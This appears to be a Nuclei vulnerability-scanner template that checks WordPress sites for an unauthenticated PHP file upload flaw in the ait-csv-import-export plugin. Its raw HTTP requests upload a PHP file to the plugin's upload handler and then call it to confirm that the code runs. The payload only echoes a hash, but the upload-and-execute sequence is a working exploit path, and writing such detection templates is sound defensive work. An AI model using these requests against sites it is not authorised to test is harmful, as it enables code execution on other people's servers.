id: ait-csv-import-export-rce
info:
  name: WordPress AIT CSV Import Export - Unauthenticated Remote Code Execution
  author:
  - l0ne1y
  tags:
  - wordpress
  - wp-plugin
  - rce
  - upload
  - unauth
  - ait-csv
  - wp
  description: |-
    Wordpress Plugin ait-csv-import-export <= 3.0.3 has an arbitrary file upload vulnerability.
    This plugin <= 3.0.3 allows an unauthenticated, remote attacker to upload and execute arbitrary PHP code. The upload handler does not require authentication, nor does it need to verify the uploaded content.
  reference:
  - https://wpscan.com/vulnerability/10471
  - https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_ait_csv_rce.rb
  severity: critical
  classification:
    cwe-id:
    - cwe-434
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 9.8
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.com/zh-cn/install-plugins/
requests:
- matchers:
  - type: word
    part: body
    words:
    - fe394b60dc324c3bac3060d600ad4349
  - type: status
    status:
    - 200
  matchers-condition: and
  raw:
  - |
    POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php HTTP/1.1
    Host: {{Hostname}}
    Accept: */*
    Content-Type: multipart/form-data; boundary=------------------------ab360007dbae2de8

    --------------------------ab360007dbae2de8
    Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
    Content-Type: application/octet-stream

    sep=;<?php echo md5('ait-csv-import-export-rce');?>

    --------------------------ab360007dbae2de8--
  - |
    GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
    Host: {{Hostname}}
